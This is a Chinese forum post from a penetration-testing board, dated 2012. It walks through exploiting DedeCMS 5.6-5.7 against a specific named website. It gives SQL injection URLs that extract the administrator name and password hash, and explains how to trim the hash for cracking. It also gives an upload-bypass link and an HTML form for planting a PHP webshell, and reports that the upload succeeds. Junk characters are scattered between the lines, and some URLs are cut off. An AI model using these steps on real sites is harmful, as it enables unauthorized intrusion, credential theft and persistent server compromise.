中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
4 u! `1 f; A: N- S
这站
http://www.political-security.com/
i% s) k7 `5 ?" d
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
R+ B, q' x* f* Z! u- Z
www.political-security.com/data/mysql_error_trace.inc
爆后台
: ]( z1 p2 V8 D$ H
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
6 W ?8 O0 I- r
然后写上语句
7 o9 O9 W) [( P: J V5 J& |) N
查看管理员帐号
. T2 a: ]+ f1 Q& }) B. p
http://www.political-security.co ... &membergroup=@`
2 h1 z( E1 v5 ~6 W3 P
2 d) n7 h* a6 Q! U- a0 D' u
admin
% p* `5 A- o; V; N! I% _, q0 p
: C/ c3 ?- u5 x4 H3 D) z
查看管理员密码
- B$ P( J R! g: |8 I* D( z2 w
http://www.political-security.co ... &membergroup=@`
' V" Z3 T; T" z3 p8 i
7 k& X* q$ R" x, Z" n
8d29b1ef9f8c5a5af429
E5 l$ H3 a& v! u0 |9 r& m4 Z; C
; Z, F' L: v& H" `. }
查看管理员密码
: d8 c- s( Z4 ~# M
: w- N V) T1 M- ^1 O
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
, n+ x f# O. ^
{2 f$ ~! ~) W. c7 G
8d2
+ h" E- ]! E9 r
9b1ef9f8c5a5af42
, N" v* J% Z% _' T9 x9 j
9
; w( O+ G, _" G
% C+ l# n( B! n1 X
cmd5没解出来 只好测试第二个方法
, i9 G# Y/ W9 u$ H. q6 r9 ?$ \
2 t% q, M5 m. V; q# J* o3 t2 Q- |% \
2 p: f6 {* r3 f& p
②上传漏洞:
& R/ h3 m$ O& u1 a/ ? T* P% ~
* _: X. j1 J8 Z
只要登陆会员中心,然后访问页面链接
5 K1 `% ]) q: l
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
% w. V: `" R2 G, v/ ]) a7 \$ L
5 u; i/ H/ c& M8 u1 Z# i* {+ [2 l
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
( i; [# r5 e z# D D$ B
9 P ~$ v5 j9 \( y
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
) }) Q, j# P$ ^4 k! P
, Z) A: D6 P0 B, {$ T* J5 V; ]
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
* Q2 P5 Q z G8 g | @# e6 D ?: [
或者
/ p4 o. n# K. K+ Q, W
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2